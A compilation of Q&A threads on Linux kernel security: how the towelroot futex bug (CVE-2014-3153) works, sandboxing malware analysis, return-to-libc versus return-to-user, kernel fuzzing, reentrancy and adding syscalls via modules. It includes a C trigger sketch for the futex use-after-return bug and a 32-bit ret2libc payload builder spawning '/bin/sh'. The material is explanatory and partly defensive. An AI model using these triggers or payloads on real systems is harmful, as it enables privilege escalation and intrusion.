How does towelroot (futex exploit) work - linux

There is a security issue in the Linux kernel which affects most Android devices and basically allows any user to become root.
Since I have been a Linux user for quite some time, I am very curious how this exploit works, and especially how I can check whether the kernel on my PC (custom built) or on any of my servers is vulnerable. Is there any source code (preferably documented) or a detailed description of the exploit so that I could see how it works? I could only find generic information, or closed-source binaries that exploit the bug and give you root when executed by any user, but no background information or details on which part of the kernel has the flaw and how this is even possible.
So far I have found this interesting article http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/ which explains that it uses a stack hack: certain syscalls are called in order to get something into the kernel stack used by futex_queue. While I understand how that works, I have no idea how changing anything in that stack can actually elevate the privileges of the current process. What I found interesting is that the author says that something changed in kernel 3.13, so a different technique is now needed to exploit this. Does that mean the bug was not actually fixed and is still exploitable in a recent kernel downloaded from kernel.org?

As SilverlightFox said, the Security site of Stack Exchange (http://security.stackexchange.com/) would probably be a better fit for this, but here goes nothing.
From the sound of it, this hack appears to be a way to elevate any user's privileges for a given amount of time, which is, to say the least, bad. My idea of how this sort of issue would work is a program that overloads the futex_queue by calling the aforementioned syscalls and then temporarily provides the user with superuser access.
I looked around at the link you provided and found that it does require a remote login via SSH or a similar procedure. In a console screenshot, it uses the line gcc -o xpl xpl.c -lpthread, which shows that this exploit is written in C. And a quote directly from the article:
This is actually where the bug is: there is a case where the waiter is still linked in the waiter list and the function returns. Please note that a kernel stack is completely separate from user stack. You can not influence kernel stack just by calling your own function in the userspace. You can manipulate kernel stack value by doing syscall.
In the image at http://www.clevcode.org/cve-2014-3153-exploit/, you can see the output of the towelroot exploit: it tests the address limits and reaches into the task structure to spawn a superuser shell. The tinyhack article also gives a simple recreation of the exploit's base, so I'd recommend taking a look at that and working from it.
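For orientation, here is a rough, non-weaponized sketch in C of the trigger sequence as I read the tinyhack write-up (the futex names A and B, the sleep()-based timing, and the exact argument values are my assumptions; the real towelroot binary does considerably more). Build it like the article's exploit, gcc -o poc poc.c -lpthread, and only ever run it in a throwaway VM:

    #define _GNU_SOURCE
    #include <linux/futex.h>
    #include <pthread.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    static int A = 0, B = 0;

    /* glibc has no futex() wrapper; for the requeue ops the "timeout"
     * argument slot carries the requeue limit instead. */
    static long futex(int *uaddr, int op, int val, unsigned long val2,
                      int *uaddr2, int val3)
    {
            return syscall(SYS_futex, uaddr, op, val, val2, uaddr2, val3);
    }

    static void *waiter(void *arg)
    {
            (void)arg;
            /* Block on A, asking to be requeued onto the PI futex B. The
             * rt_waiter used for the PI hand-off is a local variable in
             * the kernel's futex_wait_requeue_pi() stack frame. */
            futex(&A, FUTEX_WAIT_REQUEUE_PI, 0, 0, &B, 0);
            return NULL;
    }

    int main(void)
    {
            pthread_t t;

            futex(&B, FUTEX_LOCK_PI, 0, 0, NULL, 0); /* make B look owned */
            pthread_create(&t, NULL, waiter, NULL);
            sleep(1);                                /* crude: let it block */

            /* Legitimate requeue A -> B: the waiter now blocks on B's
             * rt_mutex, its rt_waiter linked into the waiter list. */
            futex(&A, FUTEX_CMP_REQUEUE_PI, 1, 1, &B, 0);

            /* Buggy kernels also accept B -> B (uaddr1 == uaddr2). The
             * waiter is woken and futex_wait_requeue_pi() returns, but
             * its rt_waiter is never unlinked: the list now points into
             * a dead kernel stack frame that the waiter thread's next
             * syscalls will reuse. That is the corruption the exploit
             * builds on to reach the task structure. */
            futex(&B, FUTEX_CMP_REQUEUE_PI, 1, 1, &B, B);

            pthread_join(t, NULL);
            return 0;
    }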
I don't know of any clear-cut way to test whether your system is vulnerable, so the best I can tell you is to harden your systems and do everything you can to keep them protected. Anyway, I don't think someone could easily get hold of server ports and logins to run this exploit on your system.
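That said, the upstream fix for CVE-2014-3153 rejects a requeue from a futex to itself before doing anything else, so one commonly suggested probe is to attempt the (harmless) self-requeue and check the error code. A minimal sketch; the expected behavior is as reported for the fix and should be verified against your kernel's kernel/futex.c:

    #define _GNU_SOURCE
    #include <errno.h>
    #include <linux/futex.h>
    #include <stdio.h>
    #include <sys/syscall.h>
    #include <unistd.h>

    int main(void)
    {
            int f = 0;
            /* Patched kernels refuse uaddr1 == uaddr2 with EINVAL. */
            long r = syscall(SYS_futex, &f, FUTEX_CMP_REQUEUE_PI,
                             1, 0, &f, 0);
            if (r == -1 && errno == EINVAL)
                    puts("same-futex requeue rejected: fix is present");
            else
                    printf("returned %ld (errno %d): kernel may be vulnerable\n",
                           r, errno);
            return 0;
    }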
Cheers!

Related

Running a brief asm script inline for dynamic analysis

Is there any good reason not to run a brief unknown (30-line) assembly script inline in a usermode C program for dynamic analysis, directly on my laptop?
There's only one system call, to time, and at this point I can tell that it's a function that takes a C string and its length, and performs some sort of encryption on it in a loop, which iterates over the string only as far as the length argument allows.
I know that the script is (supposed to be) from a piece of malicious code, but for the life of me I can't think of any way it could possibly pwn my computer, barring some sort of hardware bug (which seems unlikely given that the loop is ~7 instructions long and the strangest instruction in the whole script is a shr).
I know it sounds bad running an unknown piece of assembly code directly on the metal, but given my analysis up to this point I can't think of any way it could bite me or escape.
Yes, you can, but I wouldn't recommend it.
The problem is not how dangerous the code is this time (assuming you really understand all of the code and can predict the outcome of every system call); the problem is that it's a slippery slope, and it's not worth it considering what's at stake.
I've done quite a bit of malware analysis, and only rarely has a piece of code caught me off guard, but it has happened.
Luckily I was working in a virtual machine on an isolated network: I just restored the last snapshot and stepped through the code more carefully.
If you do this kind of analysis on your real machine, you may make a habit of it, and one day it will bite you.
Working with VMs, albeit not as comfortable as using your OS's native GUI, is the way to go.
What could go wrong with running a 7-line assembly snippet?
I don't know, it really depends on the code, but here are a few things to be careful about:
Exceptions. An instruction may intentionally fault to pass control to an exception handler. This is why it is very important that you totally understand the code: both the instructions and the data.
System call exploits. Specially crafted input to a system call may trigger a 0-day or an unpatched vulnerability in your system. This is why it is important that you can predict the outcome of every system call.
Anti-debugger techniques. There are a lot of ways a piece of code can escape a debugger (I'm thinking of Windows debugging here); it's hard to remember them all, so be suspicious of everything.
I've just named a few. It is even possible, catastrophic as it would be, that a hardware bug could lead to privileged code execution, but if that's really a possibility then nothing but a spare, expendable machine will do.
Finally, if you are going to run the malware up to a breakpoint on your machine (because I assume the work of extracting the code and its context is too much of a burden), think of what's at stake.
If you place the breakpoint on the wrong spot, if the malware takes another path, or if the debugger has a glitchy GUI, you may lose your data or the confidentiality of your machine.
In my opinion it is not worth it.
I had to make this premise for generality's sake, but we all sin a little, don't we?
I've never run a piece of malware on my own machine, but I have stepped through some with a virtual machine directly connected to the company network.
It was a controlled move, nothing happened, the competent personnel were advised, and it had a happy ending.
This may very well be your case: it may just be a decryption algorithm and nothing more.
However, only you have the final responsibility to judge whether it is acceptable to run the piece of code or not.
As I remarked above, in general it is not a good idea, and it presupposes that you really understand the code (something that is hard to do, and hard to be honest with yourself about).
If you think these prerequisites are all satisfied then go ahead and do it.
Before that I would:
Create an unprivileged user and deny it access to my data and common folders (ideally, deny it everything except what is necessary to make the program work).
Back up the critical data, if any.
Optionally:
Make a restore point.
Take a hash of the system folders, a list of installed services, and the values of the usual startup registry keys (Sysinternals has a tool to enumerate them all).
After the analysis, you can check that nothing important has changed system-wide.
It may be helpful to subst a folder and put the malware there, so that a naive path traversal stops in that folder.
Isn't there a better solution?
I like using VMs for their snapshotting capabilities, though you may stumble into an anti-VM check (but those are usually really dumb checks, so it's easy to skip past them).
For a 7-line assembly snippet, I'd simply rewrite it as a JS function and run it directly in a browser console.
You can simply turn each register into a variable and transcribe the code; you don't need to understand it globally, only locally (i.e. one instruction at a time).
JS is handy if you don't have to work with 64-bit quantities, because you have an interpreter in front of you right now :)
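To keep the examples in this thread in one language, here is the same register-to-variable idea sketched in C instead of JS, over a made-up three-instruction loop (invented for illustration, not the asker's actual code):

    /* Hypothetical snippet being analyzed:
     *   loop: mov  al, [esi + ecx - 1]
     *         xor  bl, al
     *         shr  ebx, 1
     *         loop loop            ; dec ecx, branch while ecx != 0
     * Each register becomes a variable and each instruction becomes one
     * statement, so you only reason about one instruction at a time.
     */
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
            const uint8_t *esi = (const uint8_t *)"some input";
            uint32_t ecx = strlen((const char *)esi);
            uint32_t ebx = 0;

            while (ecx != 0) {
                    uint8_t al = esi[ecx - 1]; /* mov al, [esi+ecx-1] */
                    ebx ^= al;                 /* xor bl, al          */
                    ebx >>= 1;                 /* shr ebx, 1          */
                    ecx--;                     /* loop                */
            }
            printf("ebx = 0x%08x\n", ebx);
            return 0;
    }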
Alternatively, I use whatever programming language I have at hand (one time even assembly itself; it sounds paradoxical, but due to a nasty trick I had to convert a 64-bit piece of code into a 32-bit one and patch the malware with it).
You can use Unicorn to easily emulate a CPU (if the architecture is supported) and play with your shellcode without any risk.
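For example (adapted from Unicorn's own x86 sample), this emulates two bytes of 32-bit x86 (inc ecx; dec edx) in a sandboxed CPU and reads the registers back; the snippet never executes on the host:

    /* emu.c - build with: gcc emu.c -lunicorn */
    #include <unicorn/unicorn.h>
    #include <stdio.h>

    #define CODE "\x41\x4a"   /* inc ecx; dec edx */
    #define BASE 0x1000000    /* arbitrary address to map the code at */

    int main(void)
    {
            uc_engine *uc;
            int ecx = 0x1234, edx = 0x7890;

            if (uc_open(UC_ARCH_X86, UC_MODE_32, &uc) != UC_ERR_OK)
                    return 1;

            uc_mem_map(uc, BASE, 2 * 1024 * 1024, UC_PROT_ALL);
            uc_mem_write(uc, BASE, CODE, sizeof(CODE) - 1);
            uc_reg_write(uc, UC_X86_REG_ECX, &ecx);
            uc_reg_write(uc, UC_X86_REG_EDX, &edx);

            /* Emulate from BASE to the end of the snippet. */
            uc_emu_start(uc, BASE, BASE + sizeof(CODE) - 1, 0, 0);

            uc_reg_read(uc, UC_X86_REG_ECX, &ecx);
            uc_reg_read(uc, UC_X86_REG_EDX, &edx);
            printf("ecx = 0x%x, edx = 0x%x\n", ecx, edx);

            uc_close(uc);
            return 0;
    }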

Why is return-to-libc much earlier than return-to-user?

I'm really new to this topic and only know some basic concepts. Nevertheless, there is a question that quite confuses me.
Solar Designer proposed the idea of return-to-libc in 1997 (http://seclists.org/bugtraq/1997/Aug/63). Return-to-user, from my understanding, didn't become popular until 2007 (http://seclists.org/dailydave/2007/q1/224).
However, return-to-user seems much easier than return-to-libc. So my question is: why did hackers spend so much effort building gadget chains out of libc, rather than simply using their own code in user space when exploiting a kernel vulnerability?
I don't believe they simply did not realize that there are NULL pointer dereference vulnerabilities in the kernel.
Great question, and thank you for taking some time to research the topic before making a post that causes its readers to lose hope in the future of mankind (you might be able to tell I've read a few [exploit] tags tonight).
Anyway, there are two reasons:
return-to-libc is generic, provided you have the offsets. There is no need to programmatically or manually build a return chain or scrape existing user functionality.
Partially because of linker-enabled relocations and partly because of history, the executable runtime of most programs executing on a Linux system essentially demands the libc runtime, or at least a runtime that can correctly handle _start and co. The same formula holds on Windows, just under the slightly different paradigm of return-to-kernel32/oleaut/etc., and it can actually be more immediately powerful there, particularly for shellcode with length requirements, for reasons relating to the way in which system calls are invoked indirectly through kernel32 and the SSDT.
As a side note, if you are discussing NULL pointer dereferences in the kernel, you may be confusing this with return to vDSO space, which is actually subject to a different set of constraints than the standard "mprotect and roll" userland approach.
Ret2libc, or ROP, is a technique you deploy when you cannot return to your shellcode (jmp esp or similar) because of memory protections (DEP/NX).
They serve different goals, and you may engage with both.
Return to libc
This is a buffer-overrun exploit where you have control over some input, and you know there exists a badly written program which will copy your input onto the stack and return through it. This allows you to start executing code on a machine you have no login to, or only very restricted access to.
Return to libc gives you the ability to control which code is executed; generally you end up running an existing, more natural piece of code (system(), for example) within the process's address space.
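As a hedged illustration, the classic 32-bit payload has the shape below. The three addresses are placeholders you would recover from the target (for example with gdb), ASLR is assumed off, and the 64-byte padding stands in for whatever distance separates the vulnerable buffer from the saved return address:

    /* payload.c - sketch of the classic 32-bit ret2libc stack layout:
     *   [ padding ][ &system ][ &exit ][ &"/bin/sh" ]
     * When the vulnerable function returns, it "returns into" system()
     * with "/bin/sh" as its argument and exit() as its return address.
     */
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    int main(void)
    {
            uint32_t system_addr = 0xb7e4c850; /* placeholder: &system        */
            uint32_t exit_addr   = 0xb7e40580; /* placeholder: &exit          */
            uint32_t binsh_addr  = 0xb7f6d40f; /* placeholder: "/bin/sh" addr */
            unsigned char payload[64 + 12];

            memset(payload, 'A', 64);              /* filler up to saved EIP */
            memcpy(payload + 64, &system_addr, 4); /* overwrites return addr */
            memcpy(payload + 68, &exit_addr, 4);   /* system()'s return addr */
            memcpy(payload + 72, &binsh_addr, 4);  /* system()'s argument    */

            fwrite(payload, 1, sizeof(payload), stdout); /* feed to target */
            return 0;
    }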
Return from kernel
This is a privilege escalation attack. It takes code which is already running on the machine and exploits bugs in the kernel, causing kernel privileges to be applied to the user process.
Thus you might use return-to-libc to get your code running in a web browser, and then return-to-user to perform tasks that would otherwise be restricted.
Earlier shellcode
Before return-to-libc, there was straight shellcode: the buffer overrun included the exploit code itself, and with knowledge of where the stack would be, this could be executed directly. This became somewhat obsolete with the NX bit (DEP in Windows); x86 hardware had been capable of enforcing execute permission on a segment, but, before NX, not on a page.
Why is return-to-libc much earlier than return-to-user?
The goal in these attacks is to own the machine. Frequently it was easy enough to find a vulnerability in a user-mode process that gave you the access you needed; only with the hardening of systems, by reducing privileges at the boundary and fixing the bugs in important programs, did the newer return-from-kernel techniques become necessary.

Fuzzing the Linux Kernel: A student in peril.

I am currently a student at a university studying for a computing-related degree, and my current project focuses on finding vulnerabilities in the Linux kernel. My aim is both to statically audit and to 'fuzz' the kernel (targeting version 3.0) in an attempt to find a vulnerability.
My first question is 'simple': is fuzzing the Linux kernel possible? I have heard of people fuzzing plenty of protocols etc., but never much about kernel modules. I also understand that on a Linux system everything can be seen as a file, so surely input to kernel modules should be possible via that interface, shouldn't it?
My second question: which fuzzer would you suggest? As previously stated, lots of fuzzers exist that fuzz protocols, but I don't see many of these being useful when attacking a kernel module. Obviously there are frameworks such as the Peach fuzzer, which lets you 'create' your own fuzzer from the ground up and is supposedly excellent; however, I have tried repeatedly to install Peach to no avail, and I'm finding it difficult to believe it is suitable given the difficulty I've already experienced just installing it (if anyone knows of any decent installation tutorials, please let me know :P).
I would appreciate any information you can provide on this problem. Given the breadth of the topic I have chosen, any idea of a direction is always greatly appreciated. Equally, I would ask people to refrain from telling me to start elsewhere. I do understand the size of the task at hand, but I will attempt it regardless (I'm a blue-sky thinker :P, a.k.a. stubborn as an ox).
Cheers
A.Smith
I think a good starting point would be to extend Dave Jones's Linux kernel fuzzer, Trinity: http://codemonkey.org.uk/2010/12/15/system-call-fuzzing-continued/ and http://codemonkey.org.uk/2010/11/09/system-call-abuse/
Dave seems to find more bugs whenever he extends it a bit further. The basic idea is to look at the system calls you are fuzzing and, rather than passing in totally random junk, make your fuzzer choose random junk that will at least pass the basic sanity checks in the actual system call code. In other words, you use the kernel source to let your fuzzer get further into the system calls than totally random input usually would.
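A minimal sketch of that idea (my own, not Dave's code): hand the syscall a real file descriptor and a real buffer so the first sanity checks pass, and randomize only the rest. Run it in a disposable VM, since a "successful" run is one that crashes the kernel:

    #define _GNU_SOURCE
    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/syscall.h>
    #include <time.h>
    #include <unistd.h>

    int main(void)
    {
            char buf[4096];
            int fd = open("/dev/null", O_RDWR); /* real fd: passes EBADF checks */

            srand(time(NULL));
            for (long i = 0;; i++) {
                    /* Mostly-valid pointer and fd, random length and offset:
                     * enough to get past the first EBADF/EFAULT checks and
                     * into the interesting code paths. */
                    syscall(SYS_write, fd, buf, rand() % (2 * sizeof(buf)));
                    syscall(SYS_lseek, fd, (long)rand(), rand() % 5);
                    if (i % 1000000 == 0)
                            fprintf(stderr, "iteration %ld\n", i);
            }
    }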
"Fuzzing" the kernel is quite a broad way to describe your goals.
From a kernel point of view, you can
try to fuzz the system calls, or
fuzz the character and block devices in /dev.
I'm not sure which you want to achieve.
Fuzzing the system calls would mean checking out every Linux system call (http://linux.die.net/man/2/syscalls) and trying whether you can disturb regular operation with odd parameter values.
Fuzzing character or block drivers would mean trying to send data via the /dev interfaces in a way that ends up in odd results.
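A hedged sketch of that second angle: hammer one character device with random writes and random, mostly invalid ioctl requests. The device path here is just a placeholder; try it as an unprivileged user and as root, and only inside a VM:

    #include <fcntl.h>
    #include <stdlib.h>
    #include <sys/ioctl.h>
    #include <time.h>
    #include <unistd.h>

    int main(int argc, char **argv)
    {
            unsigned char junk[256];
            const char *dev = argc > 1 ? argv[1] : "/dev/full"; /* placeholder */
            int fd = open(dev, O_RDWR | O_NONBLOCK);

            if (fd < 0)
                    return 1;
            srand(time(NULL));
            for (;;) {
                    for (size_t i = 0; i < sizeof(junk); i++)
                            junk[i] = rand();
                    write(fd, junk, rand() % sizeof(junk)); /* odd data        */
                    ioctl(fd, rand(), junk);                /* odd cmd and arg */
            }
    }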
Also, you have to differentiate between attempts by an unprivileged user and attempts by root.
My suggestion is to narrow your attempts down to a subset of your proposal. It's just too damn broad.
Good luck -
Alex.
One way to fuzz is via system call fuzzing.
Essentially the idea is to take a system call and fuzz its input over the entire range of possible values; whether the input remains within the specification defined for the system call does not matter.
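Taken literally, that can be as small as sweeping one argument of one syscall across a range and logging anything that does not fail the way the man page says it should; a toy sketch:

    #include <errno.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <unistd.h>

    int main(void)
    {
            int fd = open("/dev/null", O_RDONLY);

            /* Sweep the whence argument of lseek(2); per the man page,
             * anything outside the defined values must fail with EINVAL. */
            for (int whence = 0; whence < 4096; whence++) {
                    errno = 0;
                    off_t r = lseek(fd, 0, whence);
                    if (r == -1 && errno == EINVAL)
                            continue;
                    printf("whence=%d -> %lld (errno %d)\n",
                           whence, (long long)r, errno);
            }
            return 0;
    }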

How to convince my co-worker the linux kernel code is re-entrant?

Yeah, I know... some people are sometimes hard to convince of what sounds natural to the rest of us, and I need your help right now, SO community (or I'll go postal soon...).
One of my co-workers is convinced that the Linux kernel code is not re-entrant, because he read that somewhere the last time he got interested in it, likely 7 years ago. His reading was probably correct at that time; remember that multi-core architectures were not widespread until fairly recently, and the Linux project in its early days was not as well written or as fully fledged with fancy features.
Today is different. It's obvious that calling the same system call from different processes running in parallel on the same machine won't lead to undefined behavior. The Linux kernel is widespread now and known for its reliability, even though it runs on multicore architectures.
That is my argument for now. But what would yours be, to prove it objectively?
I was thinking of showing him some functions in the Linux kernel (on the LXR website), such as mutex_lock(), where everything is tuned to work in a concurrent environment. But the code may not be that obvious to a newbie (as I am).
Please help me.. ;-)
Search the kernel mailing list archives for "BKL". That stands for "Big Kernel Lock", which is what used to be used to prevent such problems. A lot of work has been put into breaking it up into pieces, to allow re-entry as long as different parts of the kernel are used by different processes. Most recent mentions of "BKL" (at least that I've noticed) basically refer to somebody trying to make his own life easy by locking more than somebody else approves of, at which point they frequently say something about "returning to the days of the BKL", or something of that order.
The easiest way to prove that multiple CPUs can execute in the kernel simultaneously would be to write a program that does a lot of work in the kernel (for example, looking up long pathnames in a tight loop), then run two copies of it at the same time on a dual-core machine and show that the "system" percentage in top goes above 50%.
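A sketch of that program; the path is only an example (pick any directory that exists on your system), and the ../ components force each lookup to walk more of the path in kernel mode:

    #include <sys/stat.h>

    int main(void)
    {
            struct stat st;
            const char *path =
                    "/usr/share/doc/../doc/../doc/../doc/../doc"; /* example */

            /* Path lookup happens entirely in the kernel; two copies on a
             * dual-core machine should push the "sy" figure in top above
             * 50%, which is only possible if both cores are executing
             * kernel code at the same time. */
            for (;;)
                    stat(path, &st);
    }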
At the risk of being snarky: why not just read the code? If neither of you is expert enough to follow the code through an interrupt handler and into some subsystem or other, where you can read the synchronization code, then... why bother? Isn't this just a dancing-on-the-head-of-a-pin argument? It's like a creationist demanding "proof" of evolution when they aren't interested in learning any biology.
Maybe you should have your friend prove that Linux is not re-entrant. The burden should not be on you to prove that it is.

Is it possible to add a system call via an LKM?

I'd like to add a new system call via an LKM, but I'm not sure how to do this. That is, I know that if I want to add a completely new system call, I can look through the sys_call_table, find a sys_ni_syscall entry, and just replace it, but I was curious whether it is possible to actually add to the sys_call_table. I realize it's probably not possible, given that it's a fixed-size array, but I was wondering if there are any other clever ways to add system calls without overriding an unused system call number.
Here's an example:
linux system calls
edit:
The example above shows how to implement a system call. As for implementing one from a loadable module: AFAIK that's not possible, unless you were to overwrite an existing entry, because the size of the sys_call_table array is fixed by a #define.
Keep in mind there are user space changes required as well, at least if you want to be able to actually use the new system call.
Check The Linux Documentation Project website for "The Linux Kernel Module Programming Guide" (http://www.tldp.org/LDP/lkmpg/2.6/html/index.html). Specifically, look here for System Calls: http://www.tldp.org/LDP/lkmpg/2.6/html/x978.html. That should give you a start, at least.
This is an old question, but I nevertheless want to propose my solution. The easiest way to implement a "system-call-like" interface is to rely on a fake device.
In particular, you could create a new device driver which does not actually drive anything; instead, writing to it causes the installed module to perform the required actions.
Additionally, if you want to offer several services, you can map them to ioctl operations, as in the sketch below.
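A minimal sketch of that fake-device approach; the device name demo_syscall and the ioctl number are made up for illustration. It registers a misc character device whose ioctl handler plays the role the new syscall body would have had, built with the usual obj-m module Makefile:

    #include <linux/fs.h>
    #include <linux/ioctl.h>
    #include <linux/miscdevice.h>
    #include <linux/module.h>
    #include <linux/sched.h>

    #define DEMO_PING _IO('d', 0)  /* made-up ioctl number for illustration */

    /* This is where the body of the "system call" goes. */
    static long demo_ioctl(struct file *f, unsigned int cmd, unsigned long arg)
    {
            switch (cmd) {
            case DEMO_PING:
                    printk(KERN_INFO "demo: ping from pid %d\n", current->pid);
                    return 0;
            default:
                    return -ENOTTY;
            }
    }

    static const struct file_operations demo_fops = {
            .owner          = THIS_MODULE,
            .unlocked_ioctl = demo_ioctl,
    };

    /* Registers /dev/demo_syscall with a dynamic minor; no real hardware. */
    static struct miscdevice demo_dev = {
            .minor = MISC_DYNAMIC_MINOR,
            .name  = "demo_syscall",
            .fops  = &demo_fops,
    };

    static int __init demo_init(void)
    {
            return misc_register(&demo_dev);
    }

    static void __exit demo_exit(void)
    {
            misc_deregister(&demo_dev);
    }

    module_init(demo_init);
    module_exit(demo_exit);
    MODULE_LICENSE("GPL");

User space then does fd = open("/dev/demo_syscall", O_RDONLY); ioctl(fd, DEMO_PING, 0); where it would otherwise have invoked the new system call.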
